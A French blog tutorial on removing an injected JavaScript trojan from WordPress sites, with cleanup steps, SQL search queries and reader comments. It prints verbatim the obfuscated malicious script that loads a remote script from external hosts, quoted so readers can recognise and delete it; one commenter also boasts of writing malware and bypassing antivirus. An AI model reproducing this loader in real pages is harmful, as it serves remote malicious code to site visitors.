NETTOYER SON BLOG DES VIRUS TROJAN

 


Je change un peu de sujet pour vous expliquer comment faire pour effacer définitivement d’un certain type de virus (et d’autre) qui infecte les sites wordpress.


Kaspersky Anti-Virus 2011


Mais avant toute chose je permet de vous conseiller d’acheter ou au moins d’essayer le logiciel Kaspersky Antivirus qui, pour moi, est le meilleur de tous les antivirus ( et j’en ai essayer un paquet!)


que ce soit au niveau performance, stabilité et légéreté.


C’est par là que commencera votre désinfection ou protection…


 

Revenons en au blog wordpress infecté….


Ces virus injecte du code dans vos fichiers wordpress mais aussi tout autre qui se présente sous cette forme : les fichiers index.php, index.html , default.php , default.html et *.js.


Ce sont des malware « Obfuscated Scripts » ( traduction française ???) et se nomme Trojan.Downloader.JS.Agent,JS Redirector, JSObfuscated


 


Les symptômes des trojans :


  • Lorsque vous consultez votre blog une page blanche s’affiche avec ce texte (exemple) : Parse error: syntax error, unexpected ‘<’ in /homexxx/xxx/www/xxx/WordPress/wp-includes/default-widgets.php on line 1034
  • ou Warning: Cannot modify header information – headers already sent by (output started at /homexxx/xxx/www/xxx/WordPress/wp-includes/default-filters.php:214) in /homexxx/xxx/www/xxx/WordPress/wp-includes/pluggable.php on line 865
  • Lorsque vous accédez à votre Tableau de Bord WordPress vous êtes redirigé vers une autre adresse la plupart du temps inaccessible
  • Votre antivirus (et donc celui de vos lecteurs) vous signal des alertes Trojan
  • Le navigateur affiche ceci quand vous accédez avec blog wordpress 


message-blog-infecte


Solutions inefficaces au virus wordpress :-D :

 

  • Sur certain site il est expliqué qu’il faut supprimer le code
/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement(’script’);Jqjzlgspz98uxl.setAttribute(’type’, ‘text/javascript’);Jqjzlgspz98uxl.setAttribute(’id’, ‘myscript1?);Jqjzlgspz98uxl.setAttribute(’src’,  ‘h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!’.replace(/\(|\)|\^|\!|@|\$|#|&/ig, ”));Jqjzlgspz98uxl.setAttribute(’defer’, ‘defer’);document.body.appendChild(Jqjzlgspz98uxl);}} catch(e) {}

qui se trouve à la fin de chaque fichiers qui vous sera mis en erreur lors de la consultation de votre blog. Par exemple Parse error: syntax error, unexpected ‘<’ in /homexxx/xxx/www/xxx/WordPress/wp-includes/default-widgets.php on line 1034


dans ce cas allez dans Filezilla par exemple, éditer votre fichier « default-widgets.php » et effacer ce bout de code code script qui se trouve à la fin , le remplacer par ?> pour terminer le fichier, sauvegarder et retourner sur votre blog pour le fichier suivant et ainsi de suite……


Mais cela n’est pas efficace car le trojan se trouve aussi dans les fichiers *.js mais aussi et c’est le plus important sur votre disque dur! Alors que faire?


Solutions efficaces au virus wordpress :

  1. Installer un bon antivirus par exemple Kaspersky Internet Security   QUE VOUS POUVEZ VOUS PROCURER JUSTE A DROITE TOUT EN BAS DU TUTO (c’est vraiment un logiciel excellent)
  2. Scanner votre ou vos disques durs (ça peut être long mais c’est obligatoire)
  3. Scanner votre base de donnée au cas où il y aurait un code malicieux injecté avec ceci : allez dans votre base de donnée avec PhpMyadmin puis lancez les requêtes SQL suivante :
SELECT * FROM wp_posts WHERE post_content LIKE '%<iframe%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%<noscript%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'

et effacer le contenu infecté


4.  Faire un backup de votre base donnée (tuto ici) avec ce plugin WordPress Database Backup téléchargeable ici gratuitement http://ilfilosofo.com/downloads/plugins/wp-db-backup.zip


5.  Faire un export de vos articles dans Outils / Exporter / Télécharger le fichier d’export


6.  Changer vos mot de passe FTP , base de donnée (vous devez alors mettre à jour le fichier wp-config.php) et wordpress  : pas forcément des mot de passe compliqués mais avec des majuscules et chiffres c’est mieux.


7.  Très important : n’enregistrez plus vos mot de passe FTP dans FileZilla (par exemple) car c’est par là que le trojan injecte les codes!!! et notez les mots de passe sur du papier…


-> dans « Types d’authentification » mettez « Demander un mot de passe » et je pense que vous pouvez cocher « Mémoriser pour cette session » mais si vous voulez être très prudent ne le cochez pas.


8.  Noter dans un coin vos plugins et hèmes dont vous aurez besoin plus tard ainsi que leurs paramètre de configuration


9.  Faire un backup de vos fichiers images stockés dans wp-content/uploads/….


10. Faire un backup des fichiers wp-config.php , sitemap.xml , sitemap.xml.gz , robots.txt , .htaccess (s’il existe bien sûr)


11. Vous allez prendre peur mais vous devez maintenant effacer votre installation wordpress c’est à dire tous les fichiers ainsi que les répertoires. Ne vous inquiétez pas vos articles sont saufs


12. Télécharger la dernière version de wordpress ici http://www.wordpress-fr.net/telechargements et la copier sur votre serveur


13. Copier wp-config.php , sitemap.xml , sitemap.xml.gz , robots.txt , .htaccess (vérifier que ce fichier ne contient pas de code malicieux) et les fichiers images stockés dans wp-content/uploads/….


14. Retélécharger vos plugins et thèmes et passez les au scan antivirus


15. Télécharger et installer ces plugins Antivirus WordPress http://downloads.wordpress.org/plugin/antivirus.zip WP Security Scan http://downloads.wordpress.org/plugin/wp-security-scan.zip


16. Utiliser ces permissions CHMOD : 755 pour les répertoires et 644 pour les fichiers


17. Pour être encore plus prudent vous pouvez même changer encore vos de passe FTP, base donnée et wordpress


18. Ne plus utiliser Filezilla ( mot de passe non crypté et stocké dans un fichier txt) mais plutôt FlashFXP ou FTPRush


19. Faire attention aux script utilitairex hackés (NULLED SCRIPT) qui peuvent contenir des virus!


Voilà votre blog est nettoyé et vous avez encore vos articles

Mise à jour du samedi 10 avril 2010 :


VERSION LIGHT DU TUTORIAL :


-> effectuer toutes les étapes sauf la 11


-> remplacer les script malicieux dans les fichiers php découvert par vos soins (un peu long quand même) ou remplacer les fichiers par des tous neufs (de même version bien sûr)


-> remplacer tous les fichiers .JS


POUR ACHETER KASPERSKY ANTIVIRUS C’EST PAR LA (29.95€ le moins chère est largement nécessaire)


 


ce tuto est protégé alors merci de me citer en tant que source si vous diffusez ce tuto sur votre site. Merci







Share and Enjoy:
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google

18 Réponse à “Comment se débarrasser d’un virus trojan (cheval de Troie) sur wordpress”

  1. jozzy-online dit :

    tres interessant, merci

  2. Olivier dit :

    merci
    j’en étais sur que c’était filezilla
    j’ai eu pas mal de souci avec ce virus

  3. Kris dit :

    merci pour ces explications,
    j’ai pu remettre d’aplomb mon site,

    cela fait 2 fois que j’ai eu des problèmes d’erreurs de ce genre, mais je pensais que cela venais d’une erreur de mise à jour wordpress, mais cette fois mes fichiers étaient bien infectés, je devais avoir au moins une cinquantaine de fichiers vérolés

    cette fois jechange tous mes mots de passe et surtout j’installe les pluguns antivirus

    merci encore

  4. Alex dit :

    Salut,

    J’ai un gros souci. Tout mes sites ont été attaqués. J’en ai une petite dizaine.
    http://www.bons-plans-cote-ouest.com/
    http://www.pret-vert.com/
    http://www.plan-d-epargne-logement.com/
    ….
    Et toujours le même problème.
    Une solution?
    En sachant que je suis chez OVH.

    Merci d’avance

  5. Franck dit :

    Bonsoir, lorsque ce message s’affiche à l’ouverture de votre site : « Parse error: syntax error, unexpected ‘< ' in /homez.57/informat/bons-plans-cote-ouest.com/wp-includes/default-filters.php on line 229"

    cela signifie qu'à la fin de default-filters.php se trouve un script malicieux qui ne termine pas correctement le fichier donc la solution efficace à 50% c'est de supprimer ce script et de le remplacer par ?>.
    Voir la version light du tuto si vous ne voulez pas effacer tous le contenu du site.

    Bon courage.

  6. Anouar dit :

    Bonjour.

    Comment est-ce que je peux installer le plugin et faire une archive de mes articles si je n’ai pas accés à l’interface admin de mon blog ?
    (Je vous parle des premieres étapes, si j’ai bien tout compris le reste des backups a faire se fait au niveau du ftp c’est bien ça ?)

    Merci d’avance.
    A.

  7. Helran dit :

    J’ai eu le même problème, réinstallation total de WP (mais sauvegarde du fichier config, robots, etc) et plus rien! OUF

  8. Franck dit :

    bonjour Anouar , désolé pour le retard (beaucoup de taf!). C’est une très bonne remarque et 2 solutions :

    1)si votre site s’affiche comme ceci « Parse error: syntax error, unexpected ‘< ’ in /homexxx/xxx/www/xxx/WordPress/wp-includes/default-widgets.php on line 1034″ (c’est un exemple)
    alors allez voir dans le fichier default-widgets.php ou autre bien sûr et supprimer le bou de code qui se trouve à la fin et remplacer le par ?> et ainsi se suite pour chaque fichier qui va s’afficher de cette façon. Ainsi vous aurez accès à votre site (partiellement nettoyé) pour faire votre backup et continuer les étapes.
    ou
    2)faire un backup de votre base de donnée via Phpmyadmin, je ne mis suis pas encore penché alors voici un tuto parmi d’autre : http://ainsi-bloggait-zarathoustra.fr/2008/08/21/exporter-importer-une-base-de-donnees/

    J’espère vous avoir aidé…

  9. Alice dit :

    Bonjour, je viens de suivre ce tuto très interessant pour protéger mon wordpress nouvellement installé. J’ai installé les plugins conseillés et j’ai un petit souci, ne voulant pas faire d’erreur.
    WP – Database Security me dit :

    Make a backup of your database before using this tool:

    Change your database table prefix to mitigate zero-day SQL Injection attacks.

    Before running this script:

    * wp-config must be set to writable before running this script.
    * the database user you’re using with WordPress must have ALTER rights

    Change the current: prefix to something different if it’s the default wp_
    Allowed Chars are all latin Alphanumeric Chars as well as the Chars – and _.

    J’avoue que je suis perdue, si quelqu’un peut me conseiller ???

    Merci

  10. Franck dit :

    bonjour,
    Je vais faire un petit tuto pour faire le backup de votre base donnée
    Vous le trouverez ici
    Merci pour votre question et à bientôt…

  11. [...] un petit tuto en complément de celui-ci Cette entrée a été posté par Franck le 24 août 2010 à 0 h 56 min, et placée dans [...]

  12. [...] fonction de l’administration ne fonctionnais plus. Après avoir cherché des informations et solutions sur ce cheval de Troie, j’ai appris qu’il valait mieux tout supprimer et [...]

  13. Payday Loans dit :

    Thank you, that was extremely valuable and interesting…I will be back again to read more on this topic.

  14. Louise dit :

    Salut
    Je bloque à l’étape 3. je fais un copie-coller de chacune des requêtes et je clique sur exécuter. À chaque fois, je reçois comme message: No database selected. Comment ça marche?
    Pouvez-vous aider une débutante?
    Merci.

  15. Merci pour cette aide précieuse.

  16. Franck dit :

    Mais de rien…
    Sauf que votre requète google pour accéder à mon site était laissez un commentaire wp-comment nom site web -nofollow
    et de + vous n’avez pas de site WP ====> backlink mal car je l’ai detecté facilement.
    Je n’ai rien contre ça en général mais si je le repère je vire le lien…et j’essaie votre requète;-)

  17. qsdoo dit :

    Tu utilise kaspersky? c’est un peut de la « chiotte » je dirais. J’étudie est crée des fichier malveillant depuis 6ans et je peut partager vite fait mon avis sur kaspersky.

    Kaspersky est juste pour moi (et le plus grand nombre de mes confrères) très simple à bypassed. Un peu comme tout les AV, mais personnellement, quand sa se corse c’est bien car Avira ou Norton existe.

    Bref, j’ai jamais passer + de 10minut à bypass un AV comme Kaspersky, contrairement à Norton et Avira ou j’y suis parfois rester quelque heures.

    Au final: Avira ou Norton.

    En ajoutant que aucun antivirus detect tout les virus qu’un autres antivirus detect ;) il on tous des bases d’empreinte différente. Bien-sûr certain virus sont detect par plusieurs AV, mais ce n’est pas ce que j’ai dit exactement.

    Donc voilà. Perso, quand j’voit les gens qui disent que Avast est mieux que Avira, car avast a supprimé un virus sur leur pc que avira n’avez pas vue, sa me rend fou ;) car il faut qu’il sache que avira detected forcément lui aussi des virus que avast ne detectera pas (et inversement)

    Passer a un firewall logistique, car franchement les antivirus sa sert à presque rien :D Car de nos jour (depuis quelque temp déja) tout les gens crypt leur malware avant de les propagé sur la toile, crypted et donc undetected par les Antivirus (pendant un certain temps, sa peut duré 1jour comme 1ans et +, peut pas tout expliquer ici :d) .

    Puis les connerie comme j’entend à la TV et ailleur genre « si on ce connect a internet 20minut sans antivirus on est infecté », sa c’est complétement faux mais alors… je sais même pas comment il peuvent ce permettre de dire de tel connerie. Après c’est sûr que si les gens qui font ce genre de test, sont connecter a internet avec un win98, tout service activée, et qu’il cris sur tout les forum de noob « pirater moi 76.33.54.12, win98″ bien la oui il ce peut que dans les 20minut qui suive quelqu’un le pirate, et encore c’est même pas sûr.

  18. Franck dit :

    J’utilise Kaspersky car ça fait longtemps que je suis dessus mais c’est vrai que je changerai bien pour Avira…
    De plus , il est vrai que j’utilise un firewall (Kerio) qu’il faut bien paramétré et après c’est le « top ».
    Par contre je me demande comment le code obfuscé est injecté dans les fichiers php :
    - le virus en local a accés au ftp via filezilla qui n’est pas protégé et injecte le code un peu partout ou
    - un virus online chopé avec des scripts piraté qui fait le boulot

    Je penche plus sur la 1ère solution car une fois après avoir nettoyé les fichiers php + le pc + changement et suppression mot de passe ftp dans filezilla alors j’ai plus de problème…

    En tout cas merci pour les conseils!

Laisser Un Commentaire


Fatal error: Cannot redeclare get_leaf_dirs() (previously declared in /homez.323/reussires/www/wp-content/themes/iBlogPro_v4.1.0/footer.php:102) in /homez.323/reussires/www/wp-content/themes/iBlogPro_v4.1.0/footer.php on line 106